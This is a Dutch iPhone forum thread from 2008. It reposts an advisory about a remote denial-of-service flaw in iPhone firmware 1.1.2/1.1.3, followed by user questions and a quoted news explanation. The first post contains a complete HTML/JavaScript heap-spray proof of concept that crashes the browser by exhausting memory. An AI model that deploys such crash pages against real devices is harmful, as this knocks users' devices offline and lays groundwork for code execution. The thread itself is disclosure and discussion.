iPhone Dos 1.1.2/1.1.3

iPhone Dos 1.1.2/1.1.3 discussie in iPhone algemeen forum; ( verdwijnt na registratie ) Version affected: 1.1.2 and 1.1.3 Overview: The Apple iPhone remote DoS for 1.1.2 was discovered by c0ntex, but it actually works on 1.1.3 as well. ...



Ga terug   iPhone, iPod touch, iPad en Apple TV forum > iPhone > iPhone algemeen
Wachtwoord vergeten? Registreren!
Registreer FAQ Ledenlijst Kalender Zoeken Berichten van vandaag Markeer forums als gelezen
  #1  
Oud 21 February 2008, 21:34
DertKesh's schermafbeelding
» iPhone 3GS 32GB (Wit) [FW: 6.1]  [Jailbreak: Ja]
» Ik heb geen iPad  
» Windows
 
Geregistreerd: 28 December 2007
Locatie: Nederland
Berichten: 586
Standaard iPhone Dos 1.1.2/1.1.3

Version affected: 1.1.2 and 1.1.3

Overview:
The Apple iPhone remote DoS for 1.1.2 was discovered by c0ntex, but it actually works on 1.1.3 as well. After further research it also appears that this was a known issue with Firefox version 1.5.04 and was effected cross-platform.

Called Mozilla Firefox JavaScript navigator Object Vulnerability.
DE TIP IS DUS: -> I recommend you disable Java until Apple releases a fix or patch.

___________________________________

Proof of Concept (PoC):
Code:
<html><body><script>
 
function Demo() {
 
var shellcode;
 
var addr;
 
var fill;
 
alert('attempting a crash!');
 
shellcode = unescape('%u0c0c');
 
fill = unescape('쳌');
 
addr = 0x02020202;
 
var b = fill;
 
while (b.length <= 0x40000) b+=b;
 
var c = new Array();
 
for (var i =0; i<36; i++) {
 
c[i] =
 
b.substring(0, 0x100000 - shellcode.length) + shellcode +
 
b.substring(0, 0x100000 - shellcode.length) + shellcode +
 
b.substring(0, 0x100000 - shellcode.length) + shellcode +
 
b.substring(0, 0x100000 - shellcode.length) + shellcode;
 
}
 
}
 
</script>
 
<input type='button' onClick='Demo()' value='Go!'>
 
</body></html>
BRON
__________________
I (L) iPhone

Laatst gewijzigd door DertKesh; 22 February 2008 om 03:03.
Advertentie
Advertentie Gesponsorde links (verdwijnt na registratie)

  #2  
Oud 21 February 2008, 21:54
» iPhone 3G 8GB  
» Windows
 
Geregistreerd: 27 December 2007
Locatie: BelgiŽ
Berichten: 524
Standaard

ehm wat is remote dos?
en wat betekenen die tekentjes?
ik ken nx van programmere
ik voel me plotseling zo dom.....
  #3  
Oud 21 February 2008, 22:43
iCulture's schermafbeelding
Administrator
» iPhone 7 128GB (Rosťgoud) [FW: 10.0.2]  [Jailbreak: Nee]
» iPad mini Retina Wi-Fi + 4G 64GB (Zwart) [FW: 9.3.5]  [Jailbreak: Nee]
» Mac OS X
 
Geregistreerd: 15 September 2007
Locatie: Amsterdam
Berichten: 28.450
Stuur een bericht via Instant Messenger naar iCulture Stuur een bericht via Skype™ naar iCulture Send a message via twitter to iCulture
Standaard

Remote DOS is Denial Of Service.
  #4  
Oud 21 February 2008, 23:23
Nikooos's schermafbeelding
» iPhone 5 32GB (Zwart) [FW: 10.0.2]  [Jailbreak: Nee]
» iPad 2 Wi-Fi 16GB (Wit) [FW: 10.0.2]  [Jailbreak: Nee]
» Mac OS X
 
Geregistreerd: 28 November 2007
Locatie: Tilburg
Berichten: 3.183
Standaard

uhm.. misschien ben ik gek, maar ik weet nog steeds niet wat dit precies inhoud.. Kan je wat meer info geven.

Qua programmeertaal zie ik wel dat er vanalles gebeurd, maar wat gebeurd er precies??
  #5  
Oud 21 February 2008, 23:40
» iPhone 3G 8GB  
» Windows
 
Geregistreerd: 27 December 2007
Locatie: BelgiŽ
Berichten: 524
Standaard

dus als ik het een beetje begrijp dient dit om je computer binnen te hacken vanaf je iPhone....
juist?
  #6  
Oud 22 February 2008, 02:58
DertKesh's schermafbeelding
» iPhone 3GS 32GB (Wit) [FW: 6.1]  [Jailbreak: Ja]
» Ik heb geen iPad  
» Windows
 
Geregistreerd: 28 December 2007
Locatie: Nederland
Berichten: 586
Standaard

@ Jeekes

Het is juist andersom, dus als jij met je iPhone een site bezoekt die dus met dat is "besmet" dan laat dat site een code achter op je iPhone wat jouw systeem geheugen "opeet"..

Zie deze (Engelse) uitleg hierover:

Citaat:
DoS attack on iPhone causes memory leak, freeze

iPhone owners should be on guard against a new threat, which fortunately doesn't harm the device, but still induces a freeze by taking all available system memory. According to security firm SecurityFocus, the vulnerability is exposed by a Denial of Service attack, when a maliciously crafted webpage is viewed. The page will insert code into the iPhone, which continually eats up available system memory before causing a kernel panic. While not the first attack on the iPhone, SecurityFocus believes it could be harmful to the device's wellbeing by potentially executing remote code.

The DoS exploit has been verified to work on the 1.1.2 iPhone firmware; Apple has not commented on the issue.
hier staat dat het op 1.1.2 voorkomt maar in de topic zelf staat dus dat het ook op 1.1.3 voorkomt.
  #7  
Oud 23 February 2008, 14:55
croiman's schermafbeelding
Psycho iPhone Case Modder
» iPhone 4S 16GB (Wit) [FW: 5.0.1]  [Jailbreak: Ja]
» Ik heb geen iPad  
» Windows
 
Geregistreerd: 23 November 2007
Locatie: Twilight zone with Psycho's
Berichten: 3.420
Stuur een bericht via MSN naar croiman
Standaard

idd, daarom kun je dus debug console in safari aanzetten zodat je kunt zien of je die fout binnen krijgt met safari.
__________________
PM functie overhit. Gelieve alleen serieuze probleem gevallen via PM.
Going from iphone extreme mod to Motorola Photon Q 4G LTE with simcard mod and lots more.
  #8  
Oud 23 February 2008, 18:23
» iPhone 3G 8GB  
» Windows
 
Geregistreerd: 27 December 2007
Locatie: BelgiŽ
Berichten: 524
Standaard

ah daar had ik al van gehoord, maar niet onder die naam
dank voor de verhelderende uitleg
Discussie gesloten


Er zijn 1 actieve gebruikers die momenteel deze discussie bekijken (0 leden en 1 gasten)

 
Discussietools
Weergave

Soortgelijke discussies

Discussie Auteur Forum Reacties Laatste bericht
Dos emulator op iphone/ipad in app store! borgqueenx iPad Apps 3 1 November 2010 17:51
Blijft lopen in (dos schem) DGCAR Unlock [archief] 2 4 March 2008 18:50

Regels voor berichten
Je mag geen nieuwe discussies starten
Je mag niet reageren op berichten
Je mag geen bijlagen versturen
Je mag niet je berichten bewerken

BB code is Aan
Smileys zijn Aan
[IMG]-code is Aan
HTML-code is Uit
Trackbacks are Aan
Pingbacks are Aan
Refbacks are Uit



Alle tijden zijn GMT +2. Het is nu 11:49.